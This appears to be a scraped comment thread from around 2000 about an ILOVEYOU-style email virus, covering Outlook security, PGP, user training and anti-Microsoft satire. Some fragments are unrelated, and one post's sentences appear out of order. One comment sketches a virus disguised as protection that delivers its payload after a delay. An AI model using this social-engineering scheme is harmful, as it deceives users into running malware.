A script kiddie fresh out of VBScript for ADSI 101 has practiced his new found craft
The unkowing sysadmin opens a msg entitled "Get your MCSE and earn more cash!"
The Active Directory Tree is felled....
"Hatred is the coward's revenge for being intimidated"
Thanks, you've just suggested an idea for the most destructive yet of these viruses. People will get one saying "RUN THIS, it is like ILOVEYOU except it will protect your system from all of these viruses in future!" (or phrased in more convincing-to-lamers language), and there might even be some publicity about it. So everyone jumps and runs it as quickly as they can ---- and in fact it goes and [insert favourite malicious action]. What would be even worse is if it looked like it inoculated you for 24 hrs or so, and then delivered its payload.
Well, Outlook users deserve everything they get, IMO, but it's funny how I never saw this story referenced on slashdot.
I can't remember the name of the version I instsalled (if you're interested I'll find it when I get home), but I got the international version of PGP and it works with just about everything on my system.
Eudora, BBEdit, Simple Text, and many more.
There's a permanent icon menu for it in the menu bar too. Pretty sweet.
---CONFLICT!!---
I believe Eudora would cost you about $50 if you're not upgrading a previous purchase. The newest version (4.3.1) gives you options... 1) a feature-limited free mode. 2) a fully-functional "sponsored" mode - it downloads ads that display in the window. 3) paid mode - send money, get all the features without the ads. I remember when I first bought Eudora (3.0) that the PGP program was there, but it doesn't seem to be available as an option in my current version. That may be because I downloaded the upgrade.
- "Well?" "Deep Subject."
The really sad thing about this "virus" is that I've recieved it at least 10 times from different sources - and I haven't recieved any copies of the original ILOVEYOU virus (or any variants).
Viruses are challenging and interesting.
Yeah, like biological ones. But we don't go around spreading them happily, do we?
Some of the ideas used in them have been incorporated into modern software.
Like? I can only think of BSOD as an example of payload.
Just like anything else if you don't use viruses to harm people or data their is nothing wrong with them at all.
Yes, like anything else. But if you don't use them so, what do you use them for?
__
__
Men with no respect for life must never be allowed to control the ultimate instruments of death.
GW Bu
Yet Another Offtopic Question Of Yours Truely.
How should I translate Honor System?
Does it mean: the system that should get honor, or the system that is honored, or the system that does something with the substantion honor (like "the time machine")?
Tnx...
It's... It's...
"We can confirm that Debian does *not* ship the version with the trojan horse. Our version predates it." [CA-2002-28]
Email virus infestations are never gonna end until we start properly training users in how to use computers. I think the primary problem is all of those "Learn how to use a computer and make thousands of dollars!" courses. People take a quick class at some no-name training center, bill themselves as computer litterate, and then completely blow away a hard-drive, or network share by double clicking on an attachment that they should have had the sense NOT to open after we've told them not to the FIRST 50 times.
Corporations will get what they pay for. When you set computers down in front of billions of people who have never previously seen/used one, with no real prior training, Bad Things (tm) tend to happen.
--cyphergirl
--Insert catchy
The virus takes it's name randomly from the recent documents folder, so I was wondering if there is nothing in that folder, what would happen?
-motardo
Hear me out. Linux is Microsoft's main competition right now. Because of this we are forcing them to "innovate", something they would usually avoid.
.exe files to make DAMN SURE you read any EULA contained within). This sounds like a good idea to people who believe renaming directories to folders made computing possible for the common man, but security wise it's like vigorously shaking a package from the Unibomber.
Now if MS Bob has taught us anything, Microsoft is not a company that should be innovating. When they do, they don't come up with things like "better security" or "stability", they come back with "talking paperclips", and "throw in every usless feature we can think of, memory footprint be dammed".
Unfortunatly, they also come up with the bright idea of executing email. Now MIME attachments aren't enough, they want you to be able to run/open attachments right when you get them (presumably to make sure you EXECUTE
So my friends, we are to blame. We pushed them into frantically trying to invent "necessary" features to stay on top, and look where it got us. Many of us are watching our beloved mail servers go down under the strain and rebuilding our company's PC because of our pointless competition with Micosoft.
I implore you all, please just drop this Linux thing before Micosoft innovates again.
Finkployd
ok, i'll forward your comments to my mom-in-law
.oO0Oo.
I'm sure she'll learn a very valuable lesson
meanwhile I'm sure she'd prefer to use the same client at home that she uses at work
There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
Is it the mail clients that are intelligent, or the users?
-- Ed Avis ed@membled.com
I never once received an ILOVEYOU. I feel deprived. I kinda wanted to see it. :-) Of course, using Netscape in Linux makes me immune...
It's quite simple to write a small piece of VBA to delete all e-mail with .vbs attachments on arrival. We've had this on our company for a while now, and it does the trick...